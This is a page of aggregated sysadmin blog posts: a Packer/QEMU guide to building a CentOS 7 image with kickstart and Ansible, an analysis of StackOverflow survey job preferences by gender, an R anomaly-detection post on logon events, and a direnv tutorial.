push        push a template and supporting files to a Packer build service
validate    check that a template is valid
version     Prints the Packer version

$packer --help validate Usage: packer validate [options] TEMPLATE Checks the template is valid by parsing the template and also checking the configuration with the various builders, provisioners, etc. If it is not valid, the errors will be shown and the command will exit with a non-zero exit status. If it is valid, it will exit with a zero exit status. Options: -syntax-only Only check syntax. Do not verify config of the template. -except=foo,bar,baz Validate all builds other than these -only=foo,bar,baz Validate only these builds -var 'key=value' Variable for templates, can be used multiple times. -var-file=path JSON file containing user variables. #### Help Inspect Usage: packer inspect TEMPLATE Inspects a template, parsing and outputting the components a template defines. This does not validate the contents of a template (other than basic syntax by necessity). Options: -machine-readable Machine-readable output #### Help Build $ packer --help build

Usage: packer build [options] TEMPLATE

Will execute multiple builds in parallel as defined in the template.
The various artifacts created by the template will be outputted.

Options:

-color=false               Disable color output (on by default)
-debug                     Debug mode enabled for builds
-except=foo,bar,baz        Build all builds other than these
-only=foo,bar,baz          Build only the specified builds
-force                     Force a build to continue if artifacts exist, deletes existing artifacts
-on-error=[cleanup|abort|ask] If the build fails do: clean up (default), abort, or ask
-parallel=false            Disable parallelization (on by default)
-var 'key=value'           Variable for templates, can be used multiple times.
-var-file=path             JSON file containing user variables.

## Autocompletion

To enable autocompletion

$packer -autocomplete-install ## Workflow .. and terminology. Packer uses Templates that are json files to carry the configuration to various tasks. The core task is the Build. In this stage, Packer is using the Builders to create a machine image for a single platform. eg. the Qemu Builder to create a kvm/xen virtual machine image. The next stage is provisioning. In this task, Provisioners (like ansible or shell scripts) perform tasks inside the machine image. When finished, Post-processors are handling the final tasks. Such as compress the virtual image or import it into a specific provider. ## Template a json template file contains: • builders (required) • description (optional) • variables (optional) • min_packer_version (optional) • provisioners (optional) • post-processors (optional) also comments are supported only as root level keys eg. { "_comment": "This is a comment", "builders": [ {} ] } ### Template Example eg. Qemu Builder qemu_example.json { "_comment": "This is a qemu builder example", "builders": [ { "type": "qemu" } ] } ## Validate ### Syntax Only $ packer validate -syntax-only  qemu_example.json 
Syntax-only check passed. Everything looks okay.

## Variables

### user variables

It is really simple to use variables inside the packer template:

  "variables": {
"centos_version":  "7.5",
}    

and use the variable as:

"{{user centos_version}}",

## Description

We can add on top of our template a description declaration:

eg.

  "description": "tMinimal CentOS 7 Qemu Imagen__________________________________________",

and verify it when inspect the template.

## QEMU Builder

The full documentation on QEMU Builder, can be found here

### Qemu template example

Try to keep things simple. Here is an example setup for building a CentOS 7.5 image with packer via qemu.

$cat qemu_example.json { "_comment": "This is a CentOS 7.5 Qemu Builder example", "description": "tMinimal CentOS 7 Qemu Imagen__________________________________________", "variables": { "7.5": "1804", "checksum": "714acc0aefb32b7d51b515e25546835e55a90da9fb00417fbee2d03a62801efd" }, "builders": [ { "type": "qemu", "iso_url": "http://ftp.otenet.gr/linux/centos/7/isos/x86_64/CentOS-7-x86_64-Minimal-{{user 7.5}}.iso", "iso_checksum": "{{user checksum}}", "iso_checksum_type": "sha256", "communicator": "none" } ] } ### Communicator There are three basic communicators: • none • Secure Shell (SSH) • WinRM that are configured within the builder section. Communicators are used at provisioning section for uploading files or executing scripts. In case of not using any provisioning, choosing none instead of the default ssh, disables that feature. "communicator": "none" #### iso_url can be a http url or a file path to a file. It is useful when starting to work with packer to have the ISO file local, so it doesnt trying to download it from the internet on every trial and error step. eg. "iso_url": "/home/ebal/Downloads/CentOS-7-x86_64-Minimal-{{user 7.5}}.iso" #### Inspect Template $ packer inspect qemu_example.json
Description:

Minimal CentOS 7 Qemu Image
__________________________________________

Optional variables and their defaults:

7.5      = 1804
checksum = 714acc0aefb32b7d51b515e25546835e55a90da9fb00417fbee2d03a62801efd

Builders:

qemu

Provisioners:

<No provisioners>

Note: If your build names contain user variables or template
functions such as 'timestamp', these are processed at build time,
and therefore only show in their raw form here.

$packer validate -syntax-only qemu_example.json Syntax-only check passed. Everything looks okay. #### Validate $ packer validate qemu_example.json
Template validated successfully.

### Build

Initial Build

$packer build qemu_example.json #### Build output the first packer output should be like this: qemu output will be in this color. ==> qemu: Downloading or copying ISO qemu: Downloading or copying: file:///home/ebal/Downloads/CentOS-7-x86_64-Minimal-1804.iso ==> qemu: Creating hard drive... ==> qemu: Looking for available port between 5900 and 6000 on 127.0.0.1 ==> qemu: Starting VM, booting from CD-ROM ==> qemu: Waiting 10s for boot... ==> qemu: Connecting to VM via VNC ==> qemu: Typing the boot command over VNC... ==> qemu: Waiting for shutdown... ==> qemu: Converting hard drive... Build 'qemu' finished. Use ctrl+c to break and exit the packer build. ## Automated Installation The ideal scenario is to automate the entire process, using a Kickstart file to describe the initial CentOS installation. The kickstart reference guide can be found here. In this example, this ks file CentOS7-ks.cfg can be used. In the jason template file, add the below configuration:  "boot_command":[ "<tab> text ", "ks=https://raw.githubusercontent.com/ebal/confs/master/Kickstart/CentOS7-ks.cfg ", "nameserver=9.9.9.9 ", "<enter><wait> " ], "boot_wait": "0s" That tells packer not to wait for user input and instead use the specific ks file. ### http_directory It is possible to retrieve the kickstast file from an internal HTTP server that packer can create, when building an image in an environment without internet access. Enable this feature by declaring a directory path: http_directory Path to a directory to serve using an HTTP server. The files in this directory will be available over HTTP that will be requestable from the virtual machine eg.  "http_directory": "/home/ebal/Downloads/", "http_port_min": "8090", "http_port_max": "8100", with that, the previous boot command should be written as: "boot_command":[ "<tab> text ", "ks=http://{{ .HTTPIP }}:{{ .HTTPPort }}/CentOS7-ks.cfg ", "<enter><wait>" ], "boot_wait": "0s" ## Timeout A “well known” error with packer is the Waiting for shutdown timeout error. eg. ==> qemu: Waiting for shutdown... ==> qemu: Failed to shutdown ==> qemu: Deleting output directory... Build 'qemu' errored: Failed to shutdown ==> Some builds didn't complete successfully and had errors: --> qemu: Failed to shutdown To bypass this error change the shutdown_timeout to something greater-than the default value: By default, the timeout is 5m or five minutes eg. "shutdown_timeout": "30m" ### ssh Sometimes the timeout error is on the ssh attemps. If you are using ssh as comminocator, change the below value also: "ssh_timeout": "30m", ## qemu_example.json This is a working template file:  { "_comment": "This is a CentOS 7.5 Qemu Builder example", "description": "tMinimal CentOS 7 Qemu Imagen__________________________________________", "variables": { "7.5": "1804", "checksum": "714acc0aefb32b7d51b515e25546835e55a90da9fb00417fbee2d03a62801efd" }, "builders": [ { "type": "qemu", "iso_url": "/home/ebal/Downloads/CentOS-7-x86_64-Minimal-{{user 7.5}}.iso", "iso_checksum": "{{user checksum}}", "iso_checksum_type": "sha256", "communicator": "none", "boot_command":[ "<tab> text ", "ks=http://{{ .HTTPIP }}:{{ .HTTPPort }}/CentOS7-ks.cfg ", "nameserver=9.9.9.9 ", "<enter><wait> " ], "boot_wait": "0s", "http_directory": "/home/ebal/Downloads/", "http_port_min": "8090", "http_port_max": "8100", "shutdown_timeout": "20m" } ] }  #### build packer build qemu_example.json #### Verify and when the installation is finished, check the output folder & image: $ ls
output-qemu  packer_cache  qemu_example.json

$ls output-qemu/ packer-qemu$ file output-qemu/packer-qemu
output-qemu/packer-qemu: QEMU QCOW Image (v3), 42949672960 bytes

$du -sh output-qemu/packer-qemu 1.7G output-qemu/packer-qemu$ qemu-img info packer-qemu
image: packer-qemu
file format: qcow2
virtual size: 40G (42949672960 bytes)
disk size: 1.7G
cluster_size: 65536
Format specific information:
compat: 1.1
lazy refcounts: false
refcount bits: 16
corrupt: false

### KVM

The default qemu/kvm builder will run something like this:

/usr/bin/qemu-system-x86_64
-name packer-qemu -display sdl
-netdev user,id=user.0
-vnc 127.0.0.1:32
-machine type=pc,accel=kvm
-device virtio-net,netdev=user.0
-boot once=d
-m 512M

In the builder section those qemu/kvm settings can be changed.

Using variables:

eg.

   "virtual_name": "centos7min.qcow2",
"virtual_dir":  "centos7",
"virtual_size": "20480",
"virtual_mem":  "4096M"

In Qemu Builder:

  "accelerator": "kvm",
"disk_size":   "{{ user virtual_size }}",
"format":      "qcow2",
"qemuargs":[
[  "-m",  "{{ user virtual_mem }}" ]
],

"vm_name":          "{{ user virtual_name }}",
"output_directory": "{{ user virtual_dir }}"

There is no need for packer to use a display. This is really useful when running packer on a remote machine. The automated installation can be run headless without any interaction, although there is a way to connect through vnc and watch the process.

"headless": true

#### Serial

Working with headless installation and perphaps through a command line interface on a remote machine, doesnt mean that vnc can actually be useful. Instead there is a way to use a serial output of qemu. To do that, must pass some extra qemu arguments:

eg.

  "qemuargs":[
[ "-m",      "{{ user virtual_mem }}" ],
[ "-serial", "file:serial.out" ]
],

and also pass an extra (kernel) argument console=ttyS0,115200n8 to the boot command:

  "boot_command":[
"<tab> text ",
"console=ttyS0,115200n8 ",
"ks=http://{{ .HTTPIP }}:{{ .HTTPPort }}/CentOS7-ks.cfg ",
"nameserver=9.9.9.9 ",
"<enter><wait> "
],
"boot_wait": "0s",

The serial output:

to see the serial output:

$tail -f serial.out ## Post-Processors When finished with the machine image, Packer can run tasks such as compress or importing the image to a cloud provider, etc. The simpliest way to familiarize with post-processors, is to use compress:  "post-processors":[ { "type": "compress", "format": "lz4", "output": "{{.BuildName}}.lz4" } ] ### output So here is the output: $ packer build qemu_example.json 
qemu output will be in this color.

==> qemu: Creating hard drive...
==> qemu: Starting HTTP server on port 8099
==> qemu: Looking for available port between 5900 and 6000 on 127.0.0.1
==> qemu: Starting VM, booting from CD-ROM
qemu: The VM will be run headless, without a GUI. If you want to
qemu: view the screen of the VM, connect via VNC without a password to
qemu: vnc://127.0.0.1:5982
==> qemu: Overriding defaults Qemu arguments with QemuArgs...
==> qemu: Connecting to VM via VNC
==> qemu: Typing the boot command over VNC...
==> qemu: Waiting for shutdown...
==> qemu: Converting hard drive...
==> qemu: Running post-processor: compress
==> qemu (compress): Using lz4 compression with 4 cores for qemu.lz4
==> qemu (compress): Archiving centos7/centos7min.qcow2 with lz4
==> qemu (compress): Archive qemu.lz4 completed
Build 'qemu' finished.

==> Builds finished. The artifacts of successful builds are:
--> qemu: compressed artifacts in: qemu.lz4

### info

After archiving the centos7min image the output_directory and the original qemu image is being deleted.

$qemu-img info ./centos7/centos7min.qcow2 image: ./centos7/centos7min.qcow2 file format: qcow2 virtual size: 20G (21474836480 bytes) disk size: 1.5G cluster_size: 65536 Format specific information: compat: 1.1 lazy refcounts: false refcount bits: 16 corrupt: false$ du -h qemu.lz4
992M    qemu.lz4

## Provisioners

Last but -surely- not least packer supports Provisioners.
Provisioners are commonly used for:

• installing packages
• patching the kernel
• creating users

and can be local shell scripts or more advance tools like, Ansible, puppet, chef or even powershell.

### Ansible

So here is an ansible example:

$tree testrole testrole ├── defaults │ └── main.yml ├── files │ └── main.yml ├── handlers │ └── main.yml ├── meta │ └── main.yml ├── tasks │ └── main.yml ├── templates │ └── main.yml └── vars └── main.yml 7 directories, 7 files  $ cat testrole/tasks/main.yml 
---
- name: Debug that our ansible role is working
debug:
msg: "It Works !"

- name: Install the Extra Packages for Enterprise Linux repository
yum:
name: epel-release
state: present

yum:
name: '*'
state: latest

So this ansible role will install epel repository and upgrade our image.

### template


"variables":{
"playbook_name": "testrole.yml"
},

...

"provisioners":[
{
"type":          "ansible",
"playbook_file": "{{ user playbook_name }}"
}
],

### Communicator

Ansible needs to ssh into this machine to provision it. It is time to change the communicator from none to ssh.

  "communicator": "ssh",

      "ssh_username": "root",
"ssh_timeout":  "3600s",

### output

$packer build qemu_example.json qemu output will be in this color. ==> qemu: Downloading or copying ISO qemu: Downloading or copying: file:///home/ebal/Downloads/CentOS-7-x86_64-Minimal-1804.iso ==> qemu: Creating hard drive... ==> qemu: Starting HTTP server on port 8100 ==> qemu: Found port for communicator (SSH, WinRM, etc): 4105. ==> qemu: Looking for available port between 5900 and 6000 on 127.0.0.1 ==> qemu: Starting VM, booting from CD-ROM qemu: The VM will be run headless, without a GUI. If you want to qemu: view the screen of the VM, connect via VNC without a password to qemu: vnc://127.0.0.1:5990 ==> qemu: Overriding defaults Qemu arguments with QemuArgs... ==> qemu: Connecting to VM via VNC ==> qemu: Typing the boot command over VNC... ==> qemu: Waiting for SSH to become available... ==> qemu: Connected to SSH! ==> qemu: Provisioning with Ansible... ==> qemu: Executing Ansible: ansible-playbook --extra-vars packer_build_name=qemu packer_builder_type=qemu -i /tmp/packer-provisioner-ansible594660041 /opt/hashicorp/packer/testrole.yml -e ansible_ssh_private_key_file=/tmp/ansible-key802434194 qemu: qemu: PLAY [all] ********************************************************************* qemu: qemu: TASK [testrole : Debug that our ansible role is working] *********************** qemu: ok: [default] => { qemu: "msg": "It Works !" qemu: } qemu: qemu: TASK [testrole : Install the Extra Packages for Enterprise Linux repository] *** qemu: changed: [default] qemu: qemu: TASK [testrole : upgrade all packages] ***************************************** qemu: changed: [default] qemu: qemu: PLAY RECAP ********************************************************************* qemu: default : ok=3 changed=2 unreachable=0 failed=0 qemu: ==> qemu: Halting the virtual machine... ==> qemu: Converting hard drive... ==> qemu: Running post-processor: compress ==> qemu (compress): Using lz4 compression with 4 cores for qemu.lz4 ==> qemu (compress): Archiving centos7/centos7min.qcow2 with lz4 ==> qemu (compress): Archive qemu.lz4 completed Build 'qemu' finished. ==> Builds finished. The artifacts of successful builds are: --> qemu: compressed artifacts in: qemu.lz4 ## Appendix here is the entire qemu template file: ### qemu_example.json { "_comment": "This is a CentOS 7.5 Qemu Builder example", "description": "tMinimal CentOS 7 Qemu Imagen__________________________________________", "variables": { "7.5": "1804", "checksum": "714acc0aefb32b7d51b515e25546835e55a90da9fb00417fbee2d03a62801efd", "virtual_name": "centos7min.qcow2", "virtual_dir": "centos7", "virtual_size": "20480", "virtual_mem": "4096M", "Password": "password", "ansible_playbook": "testrole.yml" }, "builders": [ { "type": "qemu", "headless": true, "iso_url": "/home/ebal/Downloads/CentOS-7-x86_64-Minimal-{{user 7.5}}.iso", "iso_checksum": "{{user checksum}}", "iso_checksum_type": "sha256", "communicator": "ssh", "ssh_username": "root", "ssh_password": "{{user Password}}", "ssh_timeout": "3600s", "boot_command":[ "<tab> text ", "console=ttyS0,115200n8 ", "ks=http://{{ .HTTPIP }}:{{ .HTTPPort }}/CentOS7-ks.cfg ", "nameserver=9.9.9.9 ", "<enter><wait> " ], "boot_wait": "0s", "http_directory": "/home/ebal/Downloads/", "http_port_min": "8090", "http_port_max": "8100", "shutdown_timeout": "30m", "accelerator": "kvm", "disk_size": "{{ user virtual_size }}", "format": "qcow2", "qemuargs":[ [ "-m", "{{ user virtual_mem }}" ], [ "-serial", "file:serial.out" ] ], "vm_name": "{{ user virtual_name }}", "output_directory": "{{ user virtual_dir }}" } ], "provisioners":[ { "type": "ansible", "playbook_file": "{{ user ansible_playbook }}" } ], "post-processors":[ { "type": "compress", "format": "lz4", "output": "{{.BuildName}}.lz4" } ] }  Tag(s): packer, ansible, qemu ## June 04, 2018 ### SysAdmin1138 #### Retargeting the StackOverflow survey The core of the critique is that they had a nice trove of data useful for recruiters and didn't do anything useful with it. Their rank these aspects of a potential job opportunity from least to most important question is the big one, and their official analysis just reports most-desired/least-desired. Since pay is one of the options, pay was the most desired thing. My proposal is that the number two and three most popular things are actually quite useful, as those are what allows a company that can't compete directly on pay to get in front of people. StackOverflow recently released the full survey data, allowing me to answer my own questions. There is some very good data they could have presented, but chose not to. First of all, the number one, two and three priorities are the ones that people are most conscious of and may be willing to compromise one to get the other two. This should have been presented. 1. All respondents top-3 ranked. 2. All men top-3 ranked. 3. All women top-3 ranked. 4. All non-binary top-3 ranked. Because men were 92% of all respondants, I'm not going to bother looking at that number since the men-top-3 would look nigh identical. Here is the top-3 chart for things Men look for in a job opportunity. 1. Pay/Benefits -- Pay me what I want 2. Language/Framework -- in the languages I want 3. Professional development -- and help me get better at it. With Office Environment and Culture as a close number 4. Yes, the squishy SJW-like "office culture" made a high ranking with men. The chart for women was a bit different, which is useful if you're targeting for diversity. This chart shows four items at about the same prevalence in the top three: • Office Environment and Culture • Pay/Benefits • Professional Development • Framework/Language The absolute rankings are a bit different, with Office Environment leading ahead of pay. The shape of this chart tells me that women value a healthy office environment and an employer willing to invest in their employees. Men value this as well, but not as much as they value money and what they'll be working on. However, the StackOverflow survey had more genders than just Man/Woman. They tracked two more categories. How did the Transgender and Gender-Nonconforming/Genderqueer/Non-Binary populations compare? These are groups who typically are the diversity in their departments. How does that affect preferences when assessing a job? While these populations are rather smaller than the other two, a clear trend emerges. Both populations value Office Environment and Culture well above anything else. Both populations also rank Diversity very highly. The GNC/GQ/NB set values that above pay/benefits. This suggests that people in this set are willing to sacrifice pay to work someplace they'll be accepted into. Looking at the ranked-in-top-3 charts has proven useful for recruitment, far more than simply looking at the top-ranked items. • Men and women look for the same things: pay, tech they'll be working with, professional development, and office-environment. • Women are more interested in professional development and office environment than men, which gives you hints about how to craft your postings to draw in more women. • Transgender and GNC/GQ/NB applicants replace professional development with diversity in what they look for. This also gives you hints about how to craft your postings to draw more of these applicants. • If you can't compete on pay, you can still compete on the other three points. They also asked about assessing company benefits. That ended up a less interesting analysis as there was little variation between the genders. Here is the chart for Women. The rankings held true across all four genders, with some variation in the number 4 and 5 spot: 1. Pay/Bonus 2. Health insurance 3. Retirement/pension matching. 4. Conference/Education Budget 5. Computer/Office equipment allowance. Men had a tie between Stock Options and Computer/Office equipment allowance with Conference/Education Budget as the next-higest. Transgender respondants preferred Computer/Office equipment allowance over Conference/Education Budget. The GNC/GQ/NB respondants matched the women in preferences. Even so, there are some suggestions here for recruiting departments to tailor their messaging regarding company benefits: • Pay is king, which we all know already. • Healthcare is second. If your company is doing anything special here, like covering employee copays/deductables, definitely mention it. • 401k and other retirement matching is a worth-while differentiator. • If you have a 401k/403b match, mention it in the job-posting every time. • I need to see what the age-based rankings are for this one. I suspect that senior engineers, who are likely older, consider this one more important than juniors. • Only men care about stock-options as a high priority benefit. There was something else I noticed in the charts, and it was hinted at in the official report. On the 'assessing a job opportunity' question, Men famously ranked diversity as their least important benefit. It looks like there was a clear "one star review" effect at work here. This is the chart of preferences for Men on that question. Note the curve of the 'Diversity' line. It's pretty smooth, until you get to 10 when it jumps sharply. That says a large population of respondants knew that Diversity would be their last-ranked item from the start, and the ranking didn't show up organically. The curve of the other lines suggests that 'Broad use of product' and 'Department/Team' were robbed of rankings to feed the Diversity tanking. However, this is an extreme example of something I saw in the other genders. The Women show it pretty well. Look at the curves between 9 and 10. The items that were ranked in the top 3 have smooth curves across the chart. Yet something like Remote Working, which had an even distribution across ranks 1 through 9, suddenly jumps for rank 10. Looking at these curves, people have very clear opinions on what their top and bottom ranks are. If you've read this far you've noticed I've pretty much ignored rankings 4 through 9. I believe these second charts show why that is; there isn't much information in them. In my opinion this is bad survey design. Having people rank a long list of things from least to most will give you a lot of wishy-washy opinions, which is not enough to build a model off of. Instead, have them pick a top-3 and maybe a bottom-2. Leave the rest alone. That will give you much clearer signals about preferences. ### HolisticInfoSec.org #### toolsmith #133 - Anomaly Detection & Threat Hunting with Anomalize When, in October and November's toolsmith posts, I redefined DFIR under the premise of Deeper Functionality for Investigators in R, I discovered a "tip of the iceberg" scenario. To that end, I'd like to revisit the concept with an additional discovery and opportunity. In reality, this is really a case of DFIR (Deeper Functionality for Investigators in R) within the general practice of the original and paramount DFIR (Digital Forensics/Incident Response). As discussed here before, those of us in the DFIR practice, and Blue Teaming at large, are overwhelmed by data and scale. Success truly requires algorithmic methods. If you're not already invested here I have an immediately applicable case study for you in tidy anomaly detection with anomalize. First, let me give credit where entirely due for the work that follows. Everything I discuss and provide is immediately derivative from Business Science (@bizScienc), specifically Matt Dancho (@mdancho84). He created anomalize, "a tidy anomaly detection algorithm that’s time-based (built on top of tibbletime) and scalable from one to many time series," when a client asked Business Science to build an open source anomaly detection algorithm that suited their needs. I'd say he responded beautifully, when his blogpost hit my radar via R-Bloggers it lived as an open tab in my browser for more than a month until generating this toolsmith. Please consider Matt's post a mandatory read as step one of the process here. I'll quote Matt specifically before shifting context: "Our client had a challenging problem: detecting anomalies in time series on daily or weekly data at scale. Anomalies indicate exceptional events, which could be increased web traffic in the marketing domain or a malfunctioning server in the IT domain. Regardless, it’s important to flag these unusual occurrences to ensure the business is running smoothly. One of the challenges was that the client deals with not one time series but thousands that need to be analyzed for these extreme events." Key takeaway: Detecting anomalies in time series on daily or weekly data at scale. Anomalies indicate exceptional events. Now shift context with me to security-specific events and incidents, as the pertain to security monitoring, incident response, and threat hunting. In my November 2017 post, recall that I discussed Time Series Regression with the Holt-Winters method and a focus on seasonality and trends. Unfortunately, I couldn't share the code for how we applied TSR, but pointed out alternate methods, including Seasonal and Trend Decomposition using Loess (STL): • Handles any type of seasonality ~ can change over time • Smoothness of the trend-cycle can also be controlled by the user • Robust to outliers Here now, Matt has created a means to immediately apply the STL method, along with the Twitter method (reference page), as part of his time_decompose() function, one of three functions specific to the anomalize package. In addition to time_decompose(), which separates the time series into seasonal, trend, and remainder components, anomalize includes: • anomalize(): Applies anomaly detection methods to the remainder component. • time_recompose(): Calculates limits that separate the “normal” data from the anomalies The methods used in anomalize(), including IQR and GESD are described in Matt's reference page. Matt ultimately set out to build a scalable adaptation of Twitter's AnomalyDetection package in order to address his client's challenges in dealing with not one time series but thousands needing to be analyzed for extreme events. You'll note that Matt describes anomalize using a dataset of the daily download counts of the 15 tidyverse packages from CRAN, relevant as he leverages the tidyverse package. I initially toyed with tweaking Matt's demo to model downloads for security-specific R packages (yes, there are such things) from CRAN, including RAppArmor, net.security, securitytxt, and cymruservices, the latter two courtesy of Bob Rudis (@hrbrmstr) of our beloved Data-Driven Security: Analysis, Visualization and Dashboards. Alas, this was a mere rip and replace, and really didn't exhibit the use of anomalize in a deserving, varied, truly security-specific context. That said, I was able to generate immediate results doing so, as seen in Figure 1  Figure 1: Initial experiment As an initial experiment you can replace packages names with those of your choosing in tidyverse_cran_downloads.R, run it in R Studio, then tweak variable names and labels in the code per Matt's README page. I wanted to run anomalize against a real security data scenario, so I went back to the dataset from the original DFIR articles where I'd utilized counts of 4624 Event IDs per day, per user, on a given set of servers. As utilized originally, I'd represented results specific to only one device and user, but herein is the beauty of anomalize. We can achieve quick results across multiple times series (multiple systems/users). This premise is but one of many where time series analysis and seasonality can be applied to security data. I originally tried to write log data from log.csv straight to an anomalize.R script with logs = read_csv("log.csv") into a tibble (ready your troubles with tibbles jokes), which was not being parsed accurately, particularly time attributes. To correct this, from Matt's Github I grabbed tidyverse_cran_downloads.R, and modified it as follows: This helped greatly thanks to the tibbletime package, which is "is an extension that allows for the creation of time aware tibbles. Some immediate advantages of this include: the ability to perform time based subsetting on tibbles, quickly summarising and aggregating results by time periods. Guess what, Matt wrote tibbletime too. :-) I then followed Matt's sequence as he posted on Business Science, but with my logs defined as a function in Security_Access_Logs_Function.R. Following, I'll give you the code snippets, as revised from Matt's examples, followed by their respective results specific to processing my Event ID 4624 daily count log. First, let's summarize daily login counts across three servers over four months. The result is evident in Figure 2.  Figure 2: Server logon counts visualized Next, let's determine which daily download logons are anomalous with Matt's three main functions, time_decompose(), anomalize(), and time_recompose(), along with the visualization function, plot_anomalies(), across the same three servers over four months. The result is revealed in Figure 3.  Figure 3: Security event log anomalies Following Matt's method using Twitter’s AnomalyDetection package, combining time_decompose(method = "twitter") with anomalize(method = "gesd"), while adjusting the trend = "4 months" to adjust median spans, we'll focus only on SERVER-549521. In Figure 4, you'll note that there are anomalous logon counts on SERVER-549521 in June.  Figure 4: SERVER-549521 logon anomalies with Twitter & GESD methods We can compare the Twitter (time_decompose) and GESD (anomalize) methods with the STL (time_decompose) and IQR (anomalize) methods, which use different decomposition and anomaly detection approaches. Again, we note anomalies in June, as seen in Figure 5.  Figure 5: SERVER-549521 logon anomalies with STL & IQR methods Obviously, the results are quite similar, as one would hope. Finally, let use Matt's plot_anomaly_decomposition() for visualizing the inner workings of how algorithm detects anomalies in the remainder for SERVER-549521. The result is a four part visualization, including observed, season, trend, and remainder as seen in Figure 6.  Figure 6: Decomposition for SERVER-549521 Logins I'm really looking forward to putting these methods to use at a much larger scale, across a far broader event log dataset. I firmly assert that blue teams are already way behind in combating automated adversary tactics and problems of sheer scale, so...much...data. It's only with tactics such as Matt's anomalize, and others of its ilk, that defenders can hope to succeed. Be sure the watch Matt's YouTube video on anomalize, Business Science is building a series of videos in addition, so keep an eye out there and on their GitHub for more great work that we can apply a blue team/defender's context to. All the code snippets are in my GitHubGist here, and the sample log file, a single R script, and a Jupyter Notebook are all available for you on my GitHub under toolsmith_r. I hope you find anomalize as exciting and useful as I have, great work by Matt, looking forward to see what's next from Business Science. Cheers...until next time. ## June 03, 2018 ### Electricmonk.nl #### direnv: Directory-specific environments Over the course of a single day I might work on a dozen different admin or development projects. In the morning I could be hacking on some Zabbix monitoring scripts, in the afternoon on auto-generated documentation and in the evening on a Python or C project. I try to keep my system clean and my projects as compartmentalized as possible, to avoid library version conflicts and such. When jumping from one project to another, the requirements of my shell environment can change significantly. One project may require /opt/nim/bin to be in my PATH. Another project might require a Python VirtualEnv to be active, or to have GOPATH set to the correct value. All in all, switching from one project to another incurs some overhead, especially if I haven't worked on it for a while. Wouldn't it be nice if we could have our environment automatically set up simply by changing to the project's directory? With direnv we can. direnv is an environment switcher for the shell. It knows how to hook into bash, zsh, tcsh, fish shell and elvish to load or unload environment variables depending on the current directory. This allows project-specific environment variables without cluttering the ~/.profile file. Before each prompt, direnv checks for the existence of a ".envrc" file in the current and parent directories. If the file exists (and is authorized), it is loaded into a bash sub-shell and all exported variables are then captured by direnv and then made available to the current shell. It's easy to use. Here's a quick guide: Install direnv (I'm using Ubuntu, but direnv is available for many Unix-like systems): fboender @ jib ~$ sudo apt install direnv

You'll have to add direnv to your .bashrc in order for it to work:

fboender @ jib ~ $tail -n1 ~/.bashrc eval "$(direnv hook bash)"

In the base directory of your project, create a .envrc file. For example:

fboender @ jib ~ $cat ~/Projects/fboender/foobar/.envrc #!/bin/bash # Settings PROJ_DIR="$PWD"
PROJ_NAME="foobar"
VENV_DIR="/home/fboender/.pyenvs"
PROJ_VENV="$VENV_DIR/$PROJ_NAME"

# Create Python virtualenv if it doesn't exist yet
if [ \! -d "$PROJ_VENV" ]; then echo "Creating new environment" virtualenv -p python3$PROJ_VENV
echo "Installing requirements"
$PROJ_VENV/bin/pip3 install -r ./requirements.txt fi # Emulate the virtualenv's activate, because we can't source things in direnv export VIRTUAL_ENV="$PROJ_VENV"
export PATH="$PROJ_VENV/bin:$PATH:$PWD" export PS1="(basename \"$VIRTUAL_ENV\") $PS1" export PYTHONPATH="$PWD/src"


This example automatically creates a Python3 virtualenv for the project if it doesn't exist yet, and installs the dependencies. Since we can only export environment variables directly, I'm emulating the virtualenv's bin/activate script by setting some Python-specific variables and exporting a new prompt.

Now when we change to the project's directory, or any underlying directory, direnv tries to activate the environment:

fboender @ jib ~ $cd ~/Projects/fboender/foobar/ direnv: error .envrc is blocked. Run direnv allow to approve its content. This warning is to be expected. Running random code when you switch to a directory can be dangerous, so direnv wants you to explicitly confirm that it's okay. When you see this message, you should always verify the contents of the .envrc file! We allow the .envrc, and direnv starts executing the contents. Since the python virtualenv is missing, it automatically creates it and installs the required dependencies. It then sets some paths in the environment and changes the prompt: fboender @ jib ~$ direnv allow
Creating new environment
Using base prefix '/usr'
New python executable in /home/fboender/.pyenvs/foobar/bin/python3
Also creating executable in /home/fboender/.pyenvs/foobar/bin/python
Installing setuptools, pkg_resources, pip, wheel...done.
Installing requirements
Collecting jsonxs (from -r ./requirements.txt (line 1))
Collecting requests (from -r ./requirements.txt (line 2))
Using cached https://files.pythonhosted.org/packages/49/df/50aa1999ab9bde74656c2919d9c0c085fd2b3775fd3eca826012bef76d8c/requests-2.18.4-py2.py3-none-any.whl
Collecting tempita (from -r ./requirements.txt (line 3))
Collecting urllib3<1.23,>=1.21.1 (from requests->-r ./requirements.txt (line 2))
Using cached https://files.pythonhosted.org/packages/63/cb/6965947c13a94236f6d4b8223e21beb4d576dc72e8130bd7880f600839b8/urllib3-1.22-py2.py3-none-any.whl
Collecting chardet<3.1.0,>=3.0.2 (from requests->-r ./requirements.txt (line 2))
Using cached https://files.pythonhosted.org/packages/bc/a9/01ffebfb562e4274b6487b4bb1ddec7ca55ec7510b22e4c51f14098443b8/chardet-3.0.4-py2.py3-none-any.whl
Collecting certifi>=2017.4.17 (from requests->-r ./requirements.txt (line 2))
Collecting idna<2.7,>=2.5 (from requests->-r ./requirements.txt (line 2))
Using cached https://files.pythonhosted.org/packages/27/cc/6dd9a3869f15c2edfab863b992838277279ce92663d334df9ecf5106f5c6/idna-2.6-py2.py3-none-any.whl
Installing collected packages: jsonxs, urllib3, chardet, certifi, idna, requests, tempita
Successfully installed certifi-2018.4.16 chardet-3.0.4 idna-2.6 jsonxs-0.6 requests-2.18.4 tempita-0.5.2 urllib3-1.22
direnv: export +PYTHONPATH +VIRTUAL_ENV ~PATH
(foobar) fboender @ jib ~/Projects/fboender/foobar (master) $ I can now work on the project without having to manually switch anything. When I'm done with the project and change to a different dir, it automatically unloads: (foobar) fboender @ jib ~/Projects/fboender/foobar (master)$ cd ~
